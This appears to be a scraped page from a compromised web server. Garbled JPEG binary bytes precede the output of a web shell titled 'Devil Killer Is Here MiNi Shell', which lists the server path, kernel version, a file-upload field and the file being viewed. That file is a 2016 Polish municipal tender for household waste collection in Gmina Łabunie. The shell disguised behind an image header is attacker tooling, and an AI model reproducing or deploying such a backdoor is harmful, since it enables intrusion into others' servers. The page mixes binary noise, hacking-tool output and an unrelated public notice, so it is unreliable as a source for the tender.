JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160525/134448-N-2016.html

<p class="kh_header"><b>Łabunie: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Łabunie w okresie od 01 lipca 2016 r. do 30 czerwca 2018 r</b><br>
<b>Numer ogłoszenia: 134448 - 2016; data zamieszczenia: 25.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łabunie , ul. Zamojska 50, 22-437 Łabunie, woj. lubelskie, tel. 084 6113019, faks 084 6113026.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.labunie.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Łabunie w okresie od 01 lipca 2016 r. do 30 czerwca 2018 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania o udzielenie zamówienia publicznego jest:
świadczenie usługi w zakresie odbioru, wywozu, utylizacji i zagospodarowania odpadów komunalnych  z ok. 1600   nieruchomości zamieszkałych (średnio 18 nieruchomości  na 1km2 ) o zabudowie jednorodzinnej           i wielorodzinnej (  zamieszkanych przez ok. 146 osób) z  terenu Gminy Łabunie w okresie od 01.07.2016 r.      do 30.06.2018 r.
Szczegółowy wykaz nieruchomości objętych zamówieniem z liczbą zamieszkałych osób na każdej nieruchomości, Wykonawca otrzyma w dniu zawarcia umowy.
 Dane dotyczące Gminy Łabunie  istotne z punktu widzenia zamówienia:   
 - obszar Gminy Łabunie  wynosi 87,48 km2, 
-  w skład Gminy Łabunie wchodzi 13 miejscowości: Łabuńki Pierwsze, Mocówka, Barchaczów , Bródek, Dąbrowa, Łabuńki Drugie, Łabunie, Wólka Łabuńska , Ruszów, Ruszów-Kolonia, Wierzbie, Majdan Ruszowski, Łabunie-Reforma ,
-  liczba osób zamieszkałych na terenie gminy  wg stanu na dzień 30.04.2016 r.  -  6446.
Szacunkowa masa odpadów, które mogą zostać odebrane i zagospodarowane w czasie trwania  zamówienia to: 876 Mg odpadów zmieszanych i 754 Mg odpadów selektywnie zebranych.        
 Pojemniki wrzutowe i worki, w ustalonym dniu odbioru odpadów w poszczególnych miejscowościach mieszkańcy będą dostarczać do ciągów komunikacyjnych.
Dane dotyczące ilości nieruchomości z których będą odbierane odpady komunalne oraz szacunkowej masy tych  odpadów, mogą ulec zmianie w wyniku zasiedlenia nowych budynków lub wyludnienia oraz w wyniku ograniczania wytwarzania odpadów przez mieszkańców. Z tytułu zmniejszenia ilości odebranych odpadów Wykonawcy  nie będą przysługiwały jakiekolwiek roszczenia. Szczegółowy wykaz nieruchomości objętych zamówieniem Wykonawca otrzyma w dniu zawarcia umowy. Odpady zmieszane będą gromadzone w pojemnikach o pojemności 120 i 240 litrów, a odpady segregowane w workach  o pojemności 60, 80 i 120 litrów o różnej kolorystyce. 
Określone ilości odpadów służą wyłącznie  jako informacje umożliwiające Wykonawcy oszacowanie ilości odpadów powstających w trakcie realizacji zamówienia.
Rzeczywista ilość odpadów objętych przedmiotem zamówienia może być odmienna (mniejsza bądź większa) od wyżej wymienionych  ilości podanych przez Zamawiającego  i nie będzie stanowić jakichkolwiek roszczeń Wykonawcy w stosunku do Zamawiającego.  
Wykonawca na podstawie w/w informacji zobowiązany jest do prawidłowego oszacowania ilości odpadów objętych przedmiotem zamówienia.
3.2. Zakres rzeczowy przedmiotu zamówienia:
1) Wykonawca zobowiązany jest do odbioru i zagospodarowania całej ilości odpadów komunalnych przekazanych przez wszystkich właścicieli nieruchomości zamieszkałych, w tym:                                                                                                         a) zmieszanych odpadów komunalnych
       b)  opakowań  wielomateriałowych,
       c)  papieru i tektury,  
       d)  szkła (z podziałem na kolorowe i bezbarwne),
       e)  tworzywa sztucznego,
       f)  odpadów ulegających biodegradacji, w tym odpadów opakowaniowych ulegających            biodegradacji oraz odpadów zielonych,
       g)  zużytych baterii i  akumulatorów,
       h)  zużytych opon,
       i)  chemikaliów ,
       j) przeterminowanych leków,
       k) mebli i innych odpadów wielkogabarytowych,
       l) metali   (puszki aluminiowe po napojach, piwie itp.),
       ł) zużytego sprzętu elektrycznego i elektronicznego,
    m) odpadów budowlanych i rozbiórkowych powstałych w wyniku drobnych prac remontowych  nie    wymagających zgłoszenia lub pozwolenia na budowę.
n) popiołu paleniskowego
2) Wykonawca zobowiązany jest do odbierania bezpośrednio z terenu ok. 1600  nieruchomości zamieszkałych  następujących frakcji odpadów komunalnych z częstotliwością:
a) raz w miesiącu - odpady zmieszane gromadzone w pojemnikach                   
b) raz na dwa miesiące - odpady selektywnie zebrane gromadzone w workach takie jak: szkło bezbarwne - worek biały ,szkło kolorowe - worek zielony,odpady opakowaniowe z tworzyw sztucznych i wielomateriałowe - worek żółty, metale - worek różowy, papier i tektura - worek niebieski , odpady ulegające biodegradacji w tym odpady zielone - worek czarny  ( jedynie w sytuacji gdy na nieruchomości nie ma możliwości posiadania kompostownika )
c)  w okresie grzewczym (październik - maj) - zimnego popiołu paleniskowego  - worek szary
d) cztery razy w  ciągu trwania zamówienia, w okresie wiosennym i jesiennym:
meble i inne  odpady wielkogabarytowe, zużyty sprzęt  elektryczny i elektroniczny, zużyte opony, baterie i akumulatory, chemikalia - wystawione poza  teren nieruchomości w miejsce umożliwiające swobodny do nich dojazd,
e) na indywidualne zgłoszenie właściciela nieruchomości odbieranie odpadów budowlano-remontowych i rozbiórkowych do pojemnika podstawionego na nieruchomość  przez Wykonawcę,
d) na  zgłoszenie  apteki w Łabuniach, odbiór przeterminowanych leków w godzinach  pracy apteki, zbieranych do pojemnika podstawionego przez Wykonawcę na czas trwania umowy ,
f) na zgłoszenie wskazanych czterech punktów użyteczności publicznej z terenu gminy Łabunie, odbiór zużytych baterii w godzinach pracy tych punktów, zbieranych do pojemników podstawionych przez Wykonawcę na czas trwania umowy.
3.3) Wykonawca zobowiązany jest w ramach wynagrodzenia  do:
a) wyposażenia nieruchomości  zamieszkałych na czas trwania umowy, w  plastikowe pojemniki z klapą, posiadające boczne kółka, przeznaczone do zbierania  odpadów  zmieszanych, w ilości i o pojemności określonej w Regulaminie utrzymania czystości i porządku na terenie gminy Łabunie - wraz z utrzymaniem ich w należytej czystości i w pełnej sprawności technicznej,
b) dostarczania worków przeznaczonych do gromadzenia poszczególnych rodzajów odpadów komunalnych selektywnie zbieranych, wykonanych z folii polietylowej LDPE ,  oznaczonych w następujący sposób: worek biały o pojemności 80 l z napisem  Szkło bezbarwne,worek zielony  o pojemności 80 l z napisem Szkło kolorowe, worek żółty o pojemności 120 l z napisem  Opakowania z tworzyw sztucznych i  wielomateriałowe,  worek różowy o pojemności 80 l z napisem Metale, worek niebieski o pojemności 80 l z napisem  Papier, worek czarny o pojemności 120 l  z napisem Bio-odpady,
worek szary o pojemności 60 l z napisem Popiół.
Uwaga: Kolory worków zostały przypisane przykładowo.
c) ustawienia do dnia 1.07.2016r.   na czas  trwania  umowy, w aptece w Łabuniach przy ul. Orzechowej 10 oznakowanego pojemnika typu foka lub równoważny o pojemności min. 5 l do selektywnego zbierania przeterminowanych leków,
d) ustawienia do dnia 1.07.2016r. na czas trwania umowy, pojemników o pojemności min. 5 l każdy, do selektywnego zbierania zużytych baterii  w: budynku wielofunkcyjnym w Łabuniach przy ul. Orzechowej 10  - dwóch pojemników, oraz w  Urzędzie Gminy Łabunie, Szkole Podstawowej w Łabuniach, Łabuńkach Pierwszych i Ruszowie -    po jednym pojemniku.  Każdy pojemnik powinien być oznakowany zgodnie z jego przeznaczeniem i zaopatrzony w małe otwory wrzutowe.
e) odbioru w III kwartale 2016 r. odpadów selektywnie zebranych w workach, które właściciel nieruchomości otrzymał od poprzedniego Wykonawcy usługi.
f) doposażenia nieruchomości w dodatkowy pojemnik/i/ lub worek (worki), bądź wymiany pojemnika na większy - w przypadku zgłoszenia przez Zamawiającego  lub właściciela nieruchomości, takiej konieczności. 
W przypadku zgłoszenia dokonanego przez właściciela nieruchomości, o fakcie należy niezwłocznie powiadomić Zamawiającego.
4) Pojemniki oraz pierwszą partię worków ( po 7 szt. ) należy dostarczyć właścicielom nieruchomości przed  dniem 01 lipca 2016 r.  Kolejne  worki muszą zostać dostarczone właścicielom nieruchomości przy każdym kolejnym odbiorze  zbieranych w nich  odpadów (na wymianę : worek pusty za worek pełny odebrany tego samego koloru ) .
5) Szacowana ilość pojemników i worków na odpady :
pojemniki  plastikowe  o pojemności 120 l - ok. 1232 szt., pojemniki plastikowe  o pojemności 240 l - ok. 377 szt., worki o pojemności 120 l w kolorze żółtym - ok. 19 000 szt., worki o pojemności 80 l w kolorze niebieskim - ok. 19 000 szt., worki o pojemności 80 l w kolorze różowym- ok.  19 000 szt., worki o pojemności 120 l w kolorze czarnym - ok. 19 000 szt., Worki o pojemności 80 l w kolorze białym - ok. 19 000 szt., Worki o pojemności 80 l w kolorze zielonym - ok. 19 000 szt., Worki o pojemności 60 l w kolorze szarym - ok. 80 000 szt.
6) Ilości pojemników  i worków zostały oszacowane przez Zamawiającego i stanowią ilość orientacyjną mającą być pomocną przy ustalaniu ceny ofertowej. Zamawiający zastrzega jednak, iż rzeczywista ilość pojemników  i worków objętych przedmiotem zamówienia może być odmienna (mniejsza bądź większa) od wyżej wymienionych ilości podanych w SIWZ.; Kolory worków zostały poddane przykładowo.
7) Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości zgodnie z ustalonym przez Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu. Wykonawca jest obowiązany do przedstawienia harmonogramu wywozu odpadów w terminie 7 dni od dnia podpisania umowy , a następnie w ciągu 7 dni od dnia przekazania informacji przez Zamawiającego o jego akceptacji, dostarczy harmonogram  właścicielom nieruchomości. Za dostarczenie harmonogramu należy uznać jego pozostawienie  w skrzynce pocztowej lub razem z workami na odpady segregowane. Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie zobowiązany do dostarczenia zmienionych harmonogramów do każdej nieruchomości objętej odbiorem odpadów komunalnych.
W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi), gdy nie jest  możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru będzie każdorazowo uzgodniony pomiędzy Zamawiającym i Wykonawcą i może polegać w szczególności na wyznaczeniu innych terminów ich odbioru. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.
8) Odbiór odpadów komunalnych od właścicieli nieruchomości Wykonawca powinien realizować w godzinach 7.00-20.00.
9) Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami komunalnymi i innymi zanieczyszczeniami wysypanymi z pojemników, worków, pojazdów w trakcie realizacji usługi wywozu.
10) Wykonawca jest obowiązany do realizacji reklamacji (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie pojemników na odpady zmieszane lub worków na odpady segregowane itp.) w przeciągu 36 godzin od otrzymania zawiadomienia e-mailem lub telefonicznie od Zamawiającego. Wykonanie reklamacji należy niezwłocznie potwierdzić e-mailem lub telefonicznie na adres Zamawiającego.
11) System odbierania odpadów komunalnych nie obejmuje odpadów powstających w wyniku prowadzenia działalności gospodarczej.
12) Wykonawca zobowiązany jest do:
a) utworzenia i obsługi z dniem 01. 07.2016 r., stacjonarnego Punktu Selektywnej Zbiórki Odpadów Komunalnych zlokalizowanego na terenie Gminy Łabunie lub w odległości nie większej niż  20 km od granicy, którejkolwiek  miejscowości Gminy Łabunie,   do którego co najmniej dwa razy w tygodniu w godzinach  9.00 - 17.00, właściciele nieruchomości zamieszkałych z terenu Gminy Łabunie  będą mogli dostarczyć selektywnie zebrane następujące rodzaje odpadów : meble i inne  odpady wielkogabarytowe, zużyty sprzęt  elektryczny i elektroniczny, zużyte opony, baterie i akumulatory, chemikalia.  Informację o miejscu działania  PSZOK  oraz terminach w jakich można dostarczać  w/w rodzaje odpadów, Wykonawca przekaże właścicielom nieruchomości razem z harmonogramem  odbioru odpadów z nieruchomości.
Punkt powinien być: zabezpieczony przed wejściem osób nieupoważnionych, wyposażony w pojemniki lub urządzenia przeznaczone do gromadzenia poszczególnych frakcji odpadów posiadające zabezpieczenia przed emisją zanieczyszczeń do gruntu i atmosfery. Wykonawca będzie prowadzić rejestr  zawierający informacje pozwalające zidentyfikować rodzaj i ilość odpadów oraz nieruchomość, z której  zostały dostarczone.  
b) wywozu i zagospodarowania zbieranych odpadów.
Wykonawca zobowiązany jest do wkalkulowania w cenę oferty, kosztu realizacji  powyższego obowiązku.
13) Wykonawca jest zobowiązany do ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze i przechowywania dokumentacji i pomiarów do wglądu Zamawiającego przez okres wykonywania zamówienia. Wykonawca jest zobowiązany do bieżącego prowadzenia ilościowej i jakościowej ewidencji odpadów  zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach i przekazywania kopii dokumentacji Zamawiającemu w terminie do 7  dnia  następnego miesiąca.
14) Wykonawca zobowiązany jest do prowadzenia i przekazywania co miesiąc w terminie do 7 dnia następnego miesiąca Zamawiającemu, ewidencji nieruchomości z których zostały odebrane zmieszane            i selektywnie zebrane odpady.
15) Wykonawca zobowiązany jest kontrolować realizowane przez właściciela nieruchomości obowiązki          w zakresie selektywnego zbierania odpadów komunalnych, a w przypadku ich niedopełnienia Wykonawca zobowiązany jest przyjąć odpady jako zmieszane odpady komunalne i niezwłocznie pisemnie powiadomić     o tym Zamawiającego, nie później niż w ciągu 3 dni(art. 9f ustawy o utrzymaniu czystości i porządku w gminach). Do informacji Wykonawca zobowiązany będzie załączyć dokumentację filmową lub zdjęciową umożliwiającą identyfikację nieruchomości z rejestracją daty i godziny.
16) Wykonawca zobowiązany jest do przekazywania odebranych zmieszanych odpadów komunalnych, pozostałości z sortowania odpadów komunalnych oraz odpadów zielonych do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK)   wskazanej w Planie gospodarki odpadami dla województwa lubelskiego 2017, oraz do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r., o odpadach (Dz. U. z 2013 r. poz. 21 z późn. zm.).
17) Wykonawca zobowiązany jest spełniać warunki określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości ( Dz. U z 2013 r. poz. 122 ) między innymi: posiadać bazę magazynowo - transportową usytuowaną w odległości nie większej niż 60  km od granicy Gminy Łabunie, na terenie, do którego posiada tytuł prawny. Baza magazynowo - transportowa musi spełniać następujące warunki:
a) teren bazy magazynowo - transportowej musi być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym,
b) miejsce przeznaczone do parkowania pojazdów musi być zabezpieczone przed emisją zanieczyszczeń do gruntu,
c) miejsce magazynowania selektywnie zbieranych odpadów komunalnych musi być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych,
d) teren bazy musi być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymogami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne (tekst. Jedn. Dz. U. z 2015 r. poz. 469 z późn. zm.),
e) baza magazynowo - transportowa musi być wyposażona w miejsca przeznaczone do parkowania pojazdów, pomieszczenie socjalne dla pracowników odpowiadające ilości zatrudnionych osób, miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych oraz legalizowaną samochodową wagę najazdową - w przypadku, gdy na terenie bazy następuje magazynowanie odpadów,
f) na terenie bazy magazynowo - transportowej powinien znajdować się także punkt bieżącej konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów, o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo - transportowej. Część transportowa oraz część magazynowa bazy mogą znajdować się na oddzielnych terenach, przy jednoczesnym spełnieniu powyższych warunków.
g) posiadać na terenie bazy magazynowo - transportowej urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania - urządzenia należy utrzymywać we właściwym stanie technicznym i sanitarnym,
18) Wykonawca zobowiązany jest  posiadać co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej   oraz samochód dostawczy lub terenowy przystosowany do odbioru odpadów komunalnych z możliwością wjazdu na drogi gminne o szerokości  od 2,4m do 3,0 m i masie rzeczywistej do 5 ton.
19) Pojazdy muszą spełniać następujące warunki:
a) posiadać  trwale i czytelnie oznakowane  w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne,
b) być zarejestrowane i dopuszczone do ruchu oraz posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym,
c) być wyposażone  w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
d) wyposażone w monitoring bazujący na  systemie pozycjonowania satelitarnego (GPS) umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach  wyładunku odpadów,
e)  konstrukcja pojazdów musi zabezpieczać przed niekontrolowanym wydostaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu oraz minimalizować oddziaływanie czynników atmosferycznych na odpady.
20) Wykonawca musi utrzymywać odpowiedni stan sanitarny pojazdów i urządzeń poprzez wykonywanie następujących czynności:
a) mycie i dezynfekcję z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na 2 tygodnie. Wykonawca winien posiadać aktualne dokumenty potwierdzające wykonanie czynności,
b) opróżnianie pojazdów z odpadów i parkowanie  na koniec każdego dnia roboczego wyłącznie na terenie bazy magazynowo - transportowej,  
c) dopuszcza się wyposażenie pojazdów w urządzenie do ważenia odpadów komunalnych.
21) Zakazuje się Wykonawcy mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości zamieszkałych na terenie Gminy Łabunie.
22) W przypadku stwierdzenia, że usługi wykonywane są niezgodnie z obowiązującymi przepisami Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
23) Wykonawca ponosi odpowiedzialność za zniszczenie lub uszkodzenie pojemników do gromadzenia odpadów przekazanych  właścicielom nieruchomości, powstałych w związku z realizacją przedmiotu umowy i w przypadku jego trwałego uszkodzenia dokonać wymiany na wolny od wad.
24) Na żądanie Zamawiającego, na czas trwania umowy, Wykonawca będzie zobowiązany zainstalować na wskazanym mu stanowisku komputerowym będącym własnością Zamawiającego oprogramowanie umożliwiające bieżącą kontrolę pracy sprzętu wykorzystywanego przez Wykonawcę.
25) na żądanie Zamawiającego na czas trwania umowy, Wykonawca będzie zobowiązany zainstalować i użytkować na własnym sprzęcie przekazane oprogramowanie ewidencyjno-sprawozdawcze z realizacji usługi w zakresie odbierania i zagospodarowania odpadów komunalnych.
3.4 Obowiązki Wykonawcy:
1) Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
2) Wykonawca zobowiązany jest do realizacji przedmiotu umowy przy zachowaniu należytej staranności zgodnie z przepisami prawa w szczególności: - ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (tekst. Jedn. Dz. U. z 2016r. poz. 250 ze zm.) wraz z przepisami wykonawczymi, ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21) i przepisami wykonawczymi, ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2016 r. poz. 672) wraz z przepisami wykonawczymi, ustawy z dnia 11 września 2015 r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z 2015r. poz. 1688 ), ustawy z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. z 2015r., poz. 687 z późn. zm), Plan gospodarki odpadami województwa lubelskiego 2017  (uchwała Nr XXIV/396/12  Sejmiku Województwa Lubelskiego z dnia 30 lipca 2012r.), Regulaminu utrzymania czystości i porządku na terenie Gminy Łabunie.
3)Wykonawca w okresie obowiązywania umowy zobowiązany jest dążyć do  osiągnięcia poziomu recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła oraz poziom recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych w wysokości określonej w przepisach rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645).       
4) Wykonawca w okresie obowiązywania umowy jest zobowiązany ograniczyć masę odpadów komunalnych ulegających biodegradacji przekazywanych do składowania do wysokości określonej w przepisach rozporządzenia Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676),
5) Wykonawca, zgodnie z art. 9 lit. n ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2016 r. poz. 250), zobowiązany jest do sporządzania półrocznych sprawozdań                         i przekazywania ich Wójtowi Gminy Łabunie w terminie do końca miesiąca następującego po upływie półrocza, którego dotyczy wraz z dokumentami sporządzanymi na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
